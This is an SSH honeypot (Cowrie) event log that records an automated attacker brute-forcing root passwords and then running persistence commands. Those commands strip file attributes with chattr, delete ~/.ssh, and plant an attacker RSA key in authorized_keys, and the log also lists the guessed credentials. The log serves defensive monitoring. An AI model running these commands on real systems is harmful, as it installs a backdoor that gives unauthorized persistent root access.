{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:10:50.345745Z","src_ip":"212.227.235.229","session":"09f9f6f7c3fc"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:10:50.347119Z","src_ip":"212.227.235.229","session":"09f9f6f7c3fc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:10:50.680336Z","src_ip":"212.227.235.229","session":"09f9f6f7c3fc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53134,"dst_ip":"1.2.3.4","dst_port":22,"session":"b67b3a9a74e6","protocol":"ssh","message":"New connection: 212.227.235.229:53134 (1.2.3.4:22) [session: b67b3a9a74e6]","sensor":"my-vps","timestamp":"2025-09-08T22:10:50.843738Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:10:50.844596Z","src_ip":"212.227.235.229","session":"b67b3a9a74e6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:10:51.029231Z","src_ip":"212.227.235.229","session":"b67b3a9a74e6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:10:51.413129Z","src_ip":"212.227.235.229","session":"09f9f6f7c3fc"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:10:51.413866Z","src_ip":"212.227.235.229","session":"09f9f6f7c3fc"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:10:51.747176Z","src_ip":"212.227.235.229","session":"09f9f6f7c3fc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:10:51.748034Z","src_ip":"212.227.235.229","session":"09f9f6f7c3fc"}
{"eventid":"cowrie.login.success","username":"root","password":"P@Ssw0rd123!@#","message":"login attempt [root/P@Ssw0rd123!@#] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:10:51.785628Z","src_ip":"212.227.235.229","session":"b67b3a9a74e6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43228,"dst_ip":"1.2.3.4","dst_port":22,"session":"ff1a88bdca8c","protocol":"ssh","message":"New connection: 212.227.235.229:43228 (1.2.3.4:22) [session: ff1a88bdca8c]","sensor":"my-vps","timestamp":"2025-09-08T22:10:52.075006Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:10:52.076162Z","src_ip":"212.227.235.229","session":"ff1a88bdca8c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:10:52.173446Z","src_ip":"212.227.235.229","session":"b67b3a9a74e6"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:10:52.174107Z","src_ip":"212.227.235.229","session":"b67b3a9a74e6"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:10:52.174996Z","src_ip":"212.227.235.229","session":"b67b3a9a74e6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:10:52.362578Z","src_ip":"212.227.235.229","session":"b67b3a9a74e6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:10:52.406569Z","src_ip":"212.227.235.229","session":"ff1a88bdca8c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:10:52.852055Z","src_ip":"212.227.235.229","session":"b67b3a9a74e6"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:10:52.852763Z","src_ip":"212.227.235.229","session":"b67b3a9a74e6"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:10:53.042385Z","src_ip":"212.227.235.229","session":"b67b3a9a74e6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:10:53.043355Z","src_ip":"212.227.235.229","session":"b67b3a9a74e6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53140,"dst_ip":"1.2.3.4","dst_port":22,"session":"b700407ba6e3","protocol":"ssh","message":"New connection: 212.227.235.229:53140 (1.2.3.4:22) [session: b700407ba6e3]","sensor":"my-vps","timestamp":"2025-09-08T22:10:53.220609Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:10:53.221286Z","src_ip":"212.227.235.229","session":"b700407ba6e3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:10:53.402796Z","src_ip":"212.227.235.229","session":"b700407ba6e3"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:10:53.883288Z","src_ip":"212.227.235.229","session":"ff1a88bdca8c"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:10:54.167707Z","src_ip":"212.227.235.229","session":"b700407ba6e3"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:10:55.214123Z","src_ip":"212.227.235.229","session":"ff1a88bdca8c"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:10:55.350478Z","src_ip":"212.227.235.229","session":"b700407ba6e3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47822,"dst_ip":"1.2.3.4","dst_port":22,"session":"a72c403cadc6","protocol":"ssh","message":"New connection: 212.227.235.229:47822 (1.2.3.4:22) [session: a72c403cadc6]","sensor":"my-vps","timestamp":"2025-09-08T22:10:55.525617Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:10:55.526615Z","src_ip":"212.227.235.229","session":"a72c403cadc6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43244,"dst_ip":"1.2.3.4","dst_port":22,"session":"5bcf9744151a","protocol":"ssh","message":"New connection: 212.227.235.229:43244 (1.2.3.4:22) [session: 5bcf9744151a]","sensor":"my-vps","timestamp":"2025-09-08T22:10:55.528976Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:10:55.529644Z","src_ip":"212.227.235.229","session":"5bcf9744151a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:10:55.705370Z","src_ip":"212.227.235.229","session":"a72c403cadc6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:10:55.853467Z","src_ip":"212.227.235.229","session":"5bcf9744151a"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:10:56.460607Z","src_ip":"212.227.235.229","session":"a72c403cadc6"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:10:56.642033Z","src_ip":"212.227.235.229","session":"a72c403cadc6"}
{"eventid":"cowrie.session.closed","duration":"5.8","message":"Connection lost after 5.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:10:56.646512Z","src_ip":"212.227.235.229","session":"b67b3a9a74e6"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:10:57.185059Z","src_ip":"212.227.235.229","session":"5bcf9744151a"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:10:57.508643Z","src_ip":"212.227.235.229","session":"5bcf9744151a"}
{"eventid":"cowrie.session.closed","duration":"9.7","message":"Connection lost after 9.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:10:57.515166Z","src_ip":"212.227.235.229","session":"09f9f6f7c3fc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43382,"dst_ip":"1.2.3.4","dst_port":22,"session":"0fdc5ecec060","protocol":"ssh","message":"New connection: 212.227.235.229:43382 (1.2.3.4:22) [session: 0fdc5ecec060]","sensor":"my-vps","timestamp":"2025-09-08T22:11:04.834464Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:11:04.899919Z","src_ip":"212.227.235.229","session":"0fdc5ecec060"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:11:05.127851Z","src_ip":"212.227.235.229","session":"0fdc5ecec060"}
{"eventid":"cowrie.login.failed","username":"app","password":"2025","message":"login attempt [app/2025] failed","sensor":"my-vps","timestamp":"2025-09-08T22:11:06.015218Z","src_ip":"212.227.235.229","session":"0fdc5ecec060"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:11:07.221181Z","src_ip":"212.227.235.229","session":"0fdc5ecec060"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":60392,"dst_ip":"1.2.3.4","dst_port":22,"session":"2dd7c78e37aa","protocol":"ssh","message":"New connection: 217.72.205.35:60392 (1.2.3.4:22) [session: 2dd7c78e37aa]","sensor":"my-vps","timestamp":"2025-09-08T22:11:20.684467Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:11:20.685811Z","src_ip":"217.72.205.35","session":"2dd7c78e37aa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56370,"dst_ip":"1.2.3.4","dst_port":22,"session":"7abcfb25ad3e","protocol":"ssh","message":"New connection: 212.227.235.229:56370 (1.2.3.4:22) [session: 7abcfb25ad3e]","sensor":"my-vps","timestamp":"2025-09-08T22:11:23.636237Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:11:23.637120Z","src_ip":"212.227.235.229","session":"7abcfb25ad3e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:11:23.929279Z","src_ip":"212.227.235.229","session":"7abcfb25ad3e"}
{"eventid":"cowrie.login.success","username":"root","password":"Sy123456","message":"login attempt [root/Sy123456] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:11:25.141422Z","src_ip":"212.227.235.229","session":"7abcfb25ad3e"}
